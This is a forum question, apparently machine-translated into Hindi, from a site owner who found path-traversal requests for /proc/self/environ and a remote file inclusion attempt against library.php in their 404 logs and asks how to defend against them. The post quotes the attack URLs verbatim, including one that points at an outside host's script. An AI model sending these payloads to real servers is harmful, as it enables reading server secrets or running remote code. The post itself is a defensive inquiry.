अपने 404 लॉग के माध्यम से मैंने निम्नलिखित दो URL देखे, जो दोनों एक बार हुए:
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
तथा
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00
प्रश्न में पृष्ठ library.php
, type
एक आधा दर्जन विभिन्न स्वीकार्य मूल्यों के साथ एक चर की आवश्यकता है , और फिर एक id
चर। तो एक मान्य URL हो सकता है
library.php?type=Circle-K&id=Strange-Things-Are-Afoot
और mysql_real_escape_string
डेटाबेस को क्वेरी करने के लिए उपयोग किए जाने से पहले आईडी सभी के माध्यम से चलाए जाते हैं ।
मैं एक बदमाश हूं, लेकिन मुझे लगता है कि ये दोनों लिंक वेबरोट के खिलाफ सरल हमले हैं?
1) 404 के अलावा इस तरह की चीजों से बचाव करना कितना अच्छा है?
2) क्या मुझे आईपी को अनुमति देना चाहिए?
संपादित करें: यह भी सिर्फ एक ही देखा
/library.php=http://www.basfalt.no/scripts/danger.txt
EDIT 2: सभी 3 हमलों के लिए अपमानजनक आईपी 216.97.231.15
जो कि लॉस एंजिल्स के ठीक बाहर स्थित लूनर पेज नामक आईएसपी के लिए था ।
EDIT 3: मैंने आईएसपी को शुक्रवार सुबह स्थानीय समय पर कॉल करने का फैसला किया है और इस मुद्दे पर चर्चा की कि मैं फोन पर किससे मिल सकता हूं। मैं 24 घंटे या तो यहाँ परिणाम पोस्ट करूँगा।
EDIT 4: मैंने उनके प्रवेश को ईमेल किया और उन्होंने पहले जवाब दिया कि "वे इसे देख रहे थे" और फिर एक दिन बाद "इस मुद्दे को अब हल किया जाना चाहिए।" कोई और जानकारी नहीं, दुख की बात है।
type
स्क्रिप्ट जो उपयोग करने के लिए शामिल हैं बताता है (हालांकि एक के माध्यम से IF $_GET['type'] == 'thing') {} ESLE...
, नहीं की तरह एक सीधा लिंक के रूप में include 'type.php'
) और id
mysql_real_escape_string के माध्यम से चलाने के लिए और है कि प्रश्नों के लिए प्रयोग किया जाता है। यह जानते हुए कि, क्या मैं अभी भी सुरक्षित हूं?